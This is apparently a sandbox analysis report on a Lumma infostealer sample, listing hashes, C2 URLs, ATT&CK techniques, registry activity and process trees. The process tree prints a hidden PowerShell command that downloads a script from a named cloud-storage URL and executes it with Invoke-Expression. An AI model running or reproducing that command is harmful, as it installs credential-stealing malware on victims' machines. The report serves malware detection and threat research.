lumma | a177006460f7517a35bb7a971df24f09bde4204630e6c00c976cb57e3aa07c39

Analysis

max time kernel
203s
max time network
204s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
19-11-2024 06:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

testtest.txt
Size

122B
MD5

e3d8d364c2e11978a40a0876756f8f64
SHA1

00ea4c6338819e1ca4db49d60729e633353a2df8
SHA256

a177006460f7517a35bb7a971df24f09bde4204630e6c00c976cb57e3aa07c39
SHA512

5916e10d03091c2c9226c773f276245adb014e9ba0715948a05ed02e358ddef2dbd1dd1fb9db983faefb34c303425f2dcfe06ad4048b90c587863741ab2a5b0e

Score

10^/10

lumma discovery execution stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://fixedzip.oss-ap-southeast-5.aliyuncs.com/replace.txt

exe.dropper

https://fixedzip.oss-ap-southeast-5.aliyuncs.com/replace.txt

Extracted

Family

lumma

https://processhol.sbs/api

https://p10tgrace.sbs/api

https://peepburry828.sbs/api

https://3xp3cts1aim.sbs/api

https://p3ar11fter.sbs/api

Signatures

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Blocklisted process makes network request 12 IoCs

flow	pid	Process
67	2988	powershell.exe
79	1248	msiexec.exe
81	1248	msiexec.exe
83	1248	msiexec.exe
88	1248	msiexec.exe
90	1248	msiexec.exe
94	1248	msiexec.exe
96	1248	msiexec.exe
100	1248	msiexec.exe
103	1248	msiexec.exe
105	1248	msiexec.exe
108	1248	msiexec.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2988	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2744	GRPM.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2744 set thread context of 2656	2744	GRPM.exe	139

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	more.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133764712189577399"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings	chrome.exe

Opens file in notepad (likely ransom note) 2 IoCs

ransomware

pid	Process
3120	NOTEPAD.EXE
4796	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 16 IoCs

pid	Process
4972	chrome.exe
4972	chrome.exe
2988	powershell.exe
2988	powershell.exe
2988	powershell.exe
2744	GRPM.exe
2744	GRPM.exe
2744	GRPM.exe
2656	more.com
2656	more.com
2656	more.com
2656	more.com
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
2744	GRPM.exe
2656	more.com

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4972	chrome.exe
Token: SeCreatePagefilePrivilege	4972	chrome.exe
Token: SeShutdownPrivilege	4972	chrome.exe
Token: SeCreatePagefilePrivilege	4972	chrome.exe
Token: SeShutdownPrivilege	4972	chrome.exe
Token: SeCreatePagefilePrivilege	4972	chrome.exe
Token: SeShutdownPrivilege	4972	chrome.exe
Token: SeCreatePagefilePrivilege	4972	chrome.exe
Token: SeShutdownPrivilege	4972	chrome.exe
Token: SeCreatePagefilePrivilege	4972	chrome.exe
Token: SeShutdownPrivilege	4972	chrome.exe
Token: SeCreatePagefilePrivilege	4972	chrome.exe
Token: SeShutdownPrivilege	4972	chrome.exe
Token: SeCreatePagefilePrivilege	4972	chrome.exe
Token: SeShutdownPrivilege	4972	chrome.exe
Token: SeCreatePagefilePrivilege	4972	chrome.exe
Token: SeShutdownPrivilege	4972	chrome.exe
Token: SeCreatePagefilePrivilege	4972	chrome.exe
Token: SeShutdownPrivilege	4972	chrome.exe
Token: SeCreatePagefilePrivilege	4972	chrome.exe
Token: SeShutdownPrivilege	4972	chrome.exe
Token: SeCreatePagefilePrivilege	4972	chrome.exe
Token: SeShutdownPrivilege	4972	chrome.exe
Token: SeCreatePagefilePrivilege	4972	chrome.exe
Token: SeShutdownPrivilege	4972	chrome.exe
Token: SeCreatePagefilePrivilege	4972	chrome.exe
Token: SeShutdownPrivilege	4972	chrome.exe
Token: SeCreatePagefilePrivilege	4972	chrome.exe
Token: SeShutdownPrivilege	4972	chrome.exe
Token: SeCreatePagefilePrivilege	4972	chrome.exe
Token: SeShutdownPrivilege	4972	chrome.exe
Token: SeCreatePagefilePrivilege	4972	chrome.exe
Token: SeShutdownPrivilege	4972	chrome.exe
Token: SeCreatePagefilePrivilege	4972	chrome.exe
Token: SeShutdownPrivilege	4972	chrome.exe
Token: SeCreatePagefilePrivilege	4972	chrome.exe
Token: SeShutdownPrivilege	4972	chrome.exe
Token: SeCreatePagefilePrivilege	4972	chrome.exe
Token: SeShutdownPrivilege	4972	chrome.exe
Token: SeCreatePagefilePrivilege	4972	chrome.exe
Token: SeShutdownPrivilege	4972	chrome.exe
Token: SeCreatePagefilePrivilege	4972	chrome.exe
Token: SeShutdownPrivilege	4972	chrome.exe
Token: SeCreatePagefilePrivilege	4972	chrome.exe
Token: SeShutdownPrivilege	4972	chrome.exe
Token: SeCreatePagefilePrivilege	4972	chrome.exe
Token: SeShutdownPrivilege	4972	chrome.exe
Token: SeCreatePagefilePrivilege	4972	chrome.exe
Token: SeDebugPrivilege	2988	powershell.exe
Token: SeShutdownPrivilege	4972	chrome.exe
Token: SeCreatePagefilePrivilege	4972	chrome.exe
Token: SeShutdownPrivilege	4972	chrome.exe
Token: SeCreatePagefilePrivilege	4972	chrome.exe
Token: SeShutdownPrivilege	4972	chrome.exe
Token: SeCreatePagefilePrivilege	4972	chrome.exe
Token: SeShutdownPrivilege	4972	chrome.exe
Token: SeCreatePagefilePrivilege	4972	chrome.exe
Token: SeShutdownPrivilege	4972	chrome.exe
Token: SeCreatePagefilePrivilege	4972	chrome.exe
Token: SeShutdownPrivilege	4972	chrome.exe
Token: SeCreatePagefilePrivilege	4972	chrome.exe
Token: SeShutdownPrivilege	4972	chrome.exe
Token: SeCreatePagefilePrivilege	4972	chrome.exe
Token: SeShutdownPrivilege	4972	chrome.exe

Suspicious use of FindShellTrayWindow 33 IoCs

pid	Process
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe
4972	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4972 wrote to memory of 716	4972	chrome.exe	107
PID 4972 wrote to memory of 716	4972	chrome.exe	107
PID 4972 wrote to memory of 1852	4972	chrome.exe	108
PID 4972 wrote to memory of 1852	4972	chrome.exe	108
PID 4972 wrote to memory of 1852	4972	chrome.exe	108
PID 4972 wrote to memory of 1852	4972	chrome.exe	108
PID 4972 wrote to memory of 1852	4972	chrome.exe	108
PID 4972 wrote to memory of 1852	4972	chrome.exe	108
PID 4972 wrote to memory of 1852	4972	chrome.exe	108
PID 4972 wrote to memory of 1852	4972	chrome.exe	108
PID 4972 wrote to memory of 1852	4972	chrome.exe	108
PID 4972 wrote to memory of 1852	4972	chrome.exe	108
PID 4972 wrote to memory of 1852	4972	chrome.exe	108
PID 4972 wrote to memory of 1852	4972	chrome.exe	108
PID 4972 wrote to memory of 1852	4972	chrome.exe	108
PID 4972 wrote to memory of 1852	4972	chrome.exe	108
PID 4972 wrote to memory of 1852	4972	chrome.exe	108
PID 4972 wrote to memory of 1852	4972	chrome.exe	108
PID 4972 wrote to memory of 1852	4972	chrome.exe	108
PID 4972 wrote to memory of 1852	4972	chrome.exe	108
PID 4972 wrote to memory of 1852	4972	chrome.exe	108
PID 4972 wrote to memory of 1852	4972	chrome.exe	108
PID 4972 wrote to memory of 1852	4972	chrome.exe	108
PID 4972 wrote to memory of 1852	4972	chrome.exe	108
PID 4972 wrote to memory of 1852	4972	chrome.exe	108
PID 4972 wrote to memory of 1852	4972	chrome.exe	108
PID 4972 wrote to memory of 1852	4972	chrome.exe	108
PID 4972 wrote to memory of 1852	4972	chrome.exe	108
PID 4972 wrote to memory of 1852	4972	chrome.exe	108
PID 4972 wrote to memory of 1852	4972	chrome.exe	108
PID 4972 wrote to memory of 1852	4972	chrome.exe	108
PID 4972 wrote to memory of 1852	4972	chrome.exe	108
PID 4972 wrote to memory of 2172	4972	chrome.exe	109
PID 4972 wrote to memory of 2172	4972	chrome.exe	109
PID 4972 wrote to memory of 4372	4972	chrome.exe	110
PID 4972 wrote to memory of 4372	4972	chrome.exe	110
PID 4972 wrote to memory of 4372	4972	chrome.exe	110
PID 4972 wrote to memory of 4372	4972	chrome.exe	110
PID 4972 wrote to memory of 4372	4972	chrome.exe	110
PID 4972 wrote to memory of 4372	4972	chrome.exe	110
PID 4972 wrote to memory of 4372	4972	chrome.exe	110
PID 4972 wrote to memory of 4372	4972	chrome.exe	110
PID 4972 wrote to memory of 4372	4972	chrome.exe	110
PID 4972 wrote to memory of 4372	4972	chrome.exe	110
PID 4972 wrote to memory of 4372	4972	chrome.exe	110
PID 4972 wrote to memory of 4372	4972	chrome.exe	110
PID 4972 wrote to memory of 4372	4972	chrome.exe	110
PID 4972 wrote to memory of 4372	4972	chrome.exe	110
PID 4972 wrote to memory of 4372	4972	chrome.exe	110
PID 4972 wrote to memory of 4372	4972	chrome.exe	110
PID 4972 wrote to memory of 4372	4972	chrome.exe	110
PID 4972 wrote to memory of 4372	4972	chrome.exe	110
PID 4972 wrote to memory of 4372	4972	chrome.exe	110
PID 4972 wrote to memory of 4372	4972	chrome.exe	110
PID 4972 wrote to memory of 4372	4972	chrome.exe	110
PID 4972 wrote to memory of 4372	4972	chrome.exe	110
PID 4972 wrote to memory of 4372	4972	chrome.exe	110
PID 4972 wrote to memory of 4372	4972	chrome.exe	110
PID 4972 wrote to memory of 4372	4972	chrome.exe	110
PID 4972 wrote to memory of 4372	4972	chrome.exe	110
PID 4972 wrote to memory of 4372	4972	chrome.exe	110
PID 4972 wrote to memory of 4372	4972	chrome.exe	110
PID 4972 wrote to memory of 4372	4972	chrome.exe	110
PID 4972 wrote to memory of 4372	4972	chrome.exe	110

C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\testtest.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:3120

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4972
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe227acc40,0x7ffe227acc4c,0x7ffe227acc58
  2⤵
  PID:716
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1976,i,4904028611980121966,7719368543874049886,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1972 /prefetch:2
  2⤵
  PID:1852
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1920,i,4904028611980121966,7719368543874049886,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2148 /prefetch:3
  2⤵
  PID:2172
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2264,i,4904028611980121966,7719368543874049886,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2292 /prefetch:8
  2⤵
  PID:4372
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,4904028611980121966,7719368543874049886,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3168 /prefetch:1
  2⤵
  PID:2152
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3188,i,4904028611980121966,7719368543874049886,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3220 /prefetch:1
  2⤵
  PID:4940
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4532,i,4904028611980121966,7719368543874049886,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4568 /prefetch:1
  2⤵
  PID:2288
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4376,i,4904028611980121966,7719368543874049886,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4372 /prefetch:1
  2⤵
  PID:1352
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3312,i,4904028611980121966,7719368543874049886,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3300 /prefetch:8
  2⤵
  PID:3216
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4916,i,4904028611980121966,7719368543874049886,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4956 /prefetch:8
  2⤵
  PID:384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4544,i,4904028611980121966,7719368543874049886,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3264 /prefetch:8
  2⤵
  PID:5040
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5020,i,4904028611980121966,7719368543874049886,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5012 /prefetch:8
  2⤵
  PID:2876
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3276,i,4904028611980121966,7719368543874049886,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3424 /prefetch:8
  2⤵
  PID:636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5132,i,4904028611980121966,7719368543874049886,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3436 /prefetch:8
  2⤵
  PID:5016
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5464,i,4904028611980121966,7719368543874049886,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5484 /prefetch:2
  2⤵
  PID:2136
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5588,i,4904028611980121966,7719368543874049886,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4824 /prefetch:1
  2⤵
  PID:4712
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5760,i,4904028611980121966,7719368543874049886,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5772 /prefetch:1
  2⤵
  PID:404
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5600,i,4904028611980121966,7719368543874049886,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5520 /prefetch:1
  2⤵
  PID:412
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5908,i,4904028611980121966,7719368543874049886,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5432 /prefetch:8
  2⤵
  PID:1260
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\replace.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:4796
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4848,i,4904028611980121966,7719368543874049886,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3576 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3860

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:1236

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c powershell -WindowStyle Hidden -Command "$rQd='https://fixedzip.oss-ap-southeast-5.aliyuncs.com/replace.txt'; $pLs=New-Object System.Net.WebClient; $sLf=$pLs.DownloadString($rQd); Invoke-Expression $sLf;"
1⤵
PID:8
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -WindowStyle Hidden -Command "$rQd='https://fixedzip.oss-ap-southeast-5.aliyuncs.com/replace.txt'; $pLs=New-Object System.Net.WebClient; $sLf=$pLs.DownloadString($rQd); Invoke-Expression $sLf;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2988
- - C:\Users\Admin\AppData\Roaming\Install_4278\GRPM.exe
    "C:\Users\Admin\AppData\Roaming\Install_4278\GRPM.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    PID:2744
  - - C:\Windows\SysWOW64\more.com
      C:\Windows\SysWOW64\more.com
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      PID:2656
    - - C:\Windows\SysWOW64\msiexec.exe
        
        C:\Windows\SysWOW64\msiexec.exe
        5⤵
        Blocklisted process makes network request
        System Location Discovery: System Language Discovery
        
        PID:1248

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
afc5d5d10a687f9ad2a544b475f978ca

SHA1
9db5247ad7b4236aa19af6fd2bed5a0f7bf6af6d

SHA256
a83e4cfd18bc14b60ec8b8a429bd6df2d2cf994f0742bbc50cb2e19520a0a1c7

SHA512
0e4ae15a9d4dda7cd6e2b95eee2bf930ad7d0af4fa227e2836490bbd3442276824e3d44b2d14fb2b1e13269bd8bfafc8ac6137298015888b39fa5f279b60742f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.83.1_0\_locales\en_CA\messages.json

Filesize
851B

MD5
07ffbe5f24ca348723ff8c6c488abfb8

SHA1
6dc2851e39b2ee38f88cf5c35a90171dbea5b690

SHA256
6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

SHA512
7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.83.1_0\dasherSettingSchema.json

Filesize
854B

MD5
4ec1df2da46182103d2ffc3b92d20ca5

SHA1
fb9d1ba3710cf31a87165317c6edc110e98994ce

SHA256
6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

SHA512
939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
4b2cd96170f55f28be008ac58beddc70

SHA1
02df04e5164e1cf958193d3731031ab45500e483

SHA256
9bc638bae3c23bd0379ebbfeefbbb0d1e68108cd6e4316b324127126497c7090

SHA512
9de664d1da1acd8a3e7627257fa9cc88ab7203c447cacb38132004e9567a9a712a8022e096a5abc68dcb03a8f0f3df338d6f4157a26254d0f2fb1b6e39b73da2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
18a129b898ea89acf8115ea2d1574516

SHA1
23d871f570f44263a799a688f87eab675621aa26

SHA256
0eb5458d7900aeb6d003717cfc18c76d3b896a0c1cb679a5f563d720b8f310f4

SHA512
30fce09a5889c159b8f419fceb39c243418e3df455ff79de7a186b0769b89e769beaebad41ece42a056429392939bf75119847dea39eeb9a07343310d4688549

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
523B

MD5
7913b11dab747ad325891b9d94e2a674

SHA1
71ddc1ebc30f570f7de45a0ba9cf76472c74517f

SHA256
9e3f547303e21da79f660bab88fc5bc3053881a9bdb1e229059249a2b1de4f8c

SHA512
c4c0a2fd2fe6408ff7679647910d850d911b08186bca71b1bb16108f3ab2b5b4fabd3a573ac49e05107de21279b9a0f925b6d0fd4efc7169dc2cd4875f276a13

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
523B

MD5
beed9cb0057dbc38e7477e55b8dd1b3f

SHA1
99c67ac4c2600c9713d0523a6d04da13cda8d811

SHA256
a57cd4bd1b91c927f47c59502fe598e738558d0d3990e2c811a9f72154bc6d56

SHA512
b6064581ef1c868bb41055714e6628ef8e06bfbfb7522968bd9b28015be7a458274279e645d2a04c6fea2655a688d4dac9339ceb8a381198bd0d7d9610e888b6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
b953f020d1e8a8bd973310868f03c7a5

SHA1
404f9d96beec205c0a0da86fce51ad1b662c1893

SHA256
e93528df7c5b672c48f6b3ce5929462220abc126f6488f44f955cc859c7a1da7

SHA512
527e26e47ef9dfef65c31905e671c51afbeb1458eb65db6c47858c90ac5f9894916271a2038c60833df06f1ca28b16ddeefc737a068df7cbed4b75322daf6d35

Download Submit
